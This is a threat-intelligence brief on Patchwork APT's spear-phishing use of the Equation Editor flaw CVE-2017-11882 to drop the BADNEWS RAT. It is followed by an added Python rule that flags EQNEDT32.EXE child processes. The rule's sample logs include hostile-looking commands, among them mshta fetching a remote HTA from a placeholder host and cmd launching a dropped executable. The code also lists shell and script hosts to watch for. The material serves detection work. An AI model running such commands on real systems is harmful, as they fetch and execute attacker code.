Industry: Bio-Science, Defense & Health | Level: Tactical | Source: Malwarebytes
Threat activity from late November to early December 2021, associated with Patchwork APT, an Indian threat actor, has been shared by Malwarebytes. The group's initial access tactics involve spear-phishing with malicious documents that attempt to exploit CVE-2017-11882, the Microsoft Equation Editor vulnerability, in order to drop a new remote access trojan, BADNEWS (Ragnatela). The RAT's capabilities include executing cmd commands, capturing screenshots, logging keystrokes, collecting file lists, collecting running processes, downloading additional payloads, and uploading files. Part of the research was possible because the threat actor infected themselves by mistake. The threat actor has been active since December 2015 and, including their latest campaign, has largely targeted Pakistani entities, with recent victims in the Bio-Science, Defense, and Health industries.
- Anvilogic Use Case: Abuse EQNEDT32.EXE CVE-2017-11882
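The detection idea behind the use case above, written out as an added example (this is illustrative code, not Anvilogic's or Malwarebytes' detection content). It assumes process-creation telemetry in a flattened Sysmon Event ID 1 style with `ParentImage`, `Image` and `CommandLine` fields, and it relies on the observation, not stated on the page, that a benign Equation Editor instance renders equations and has no reason to launch any child process; so every child of `EQNEDT32.EXE` is flagged, with shells and script hosts rated higher. The log lines, hostnames and paths below are constructed samples.

```python
"""Flag process creations whose parent is the Microsoft Equation Editor.

Added example for the "Abuse EQNEDT32.EXE CVE-2017-11882" use case; not
code from the original report. Assumption: EQNEDT32.EXE should never
spawn children, so any child process is treated as suspicious.
"""
import re
from typing import Dict, List, Optional

# Key=Value pairs separated by spaces; values may themselves contain spaces,
# so a value runs until the next " Key=" token or end of line.
KV_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")

# Children that give the highest-confidence signal when spawned by EQNEDT32.EXE.
SHELL_AND_SCRIPT_HOSTS = {
    "cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe",
    "rundll32.exe", "regsvr32.exe", "certutil.exe",
}

EQNEDT = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"

# Constructed sample events (not real telemetry). Event 1 is the normal
# DCOM launch of the editor; 2, 4 and 5 are the suspicious pattern.
SAMPLE_EVENTS = [
    r'EventID=1 Host=ws01 ParentImage=C:\Windows\System32\svchost.exe Image='
    + EQNEDT + r' CommandLine="EQNEDT32.EXE" -Embedding',
    r"EventID=1 Host=ws01 ParentImage=" + EQNEDT
    + r" Image=C:\Windows\System32\cmd.exe CommandLine=cmd.exe /c start %TEMP%\update.exe",
    r"EventID=1 Host=ws02 ParentImage=C:\Windows\explorer.exe "
    r"Image=C:\Windows\System32\cmd.exe CommandLine=cmd.exe",
    r"EventID=1 Host=ws03 ParentImage=" + EQNEDT
    + r" Image=C:\Windows\System32\mshta.exe CommandLine=mshta.exe http://placeholder.invalid/x.hta",
    r"EventID=1 Host=ws04 ParentImage=" + EQNEDT
    + r" Image=C:\Users\Public\update.exe CommandLine=update.exe",
]


def parse_event(line: str) -> Dict[str, str]:
    """Parse one flattened 'Key=Value Key=Value ...' line into a dict."""
    return {key: value.strip() for key, value in KV_RE.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return a severity for a suspicious event, or None if it is not one."""
    if event.get("EventID") != "1":
        return None
    if basename(event.get("ParentImage", "")) != "eqnedt32.exe":
        return None
    child = basename(event.get("Image", ""))
    return "high" if child in SHELL_AND_SCRIPT_HOSTS else "medium"


def detect(lines: List[str]) -> List[Dict[str, Optional[str]]]:
    """Run the rule over raw event lines and return one alert per hit."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        severity = classify(event)
        if severity is None:
            continue
        alerts.append({
            "host": event.get("Host"),
            "child": basename(event.get("Image", "")),
            "severity": severity,
            "command_line": event.get("CommandLine"),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

In production this rule belongs on the SIEM side, but the logic is the same: match on the parent image name alone, because the child name and command line vary from campaign to campaign while the parent-child relationship is what the vulnerability forces.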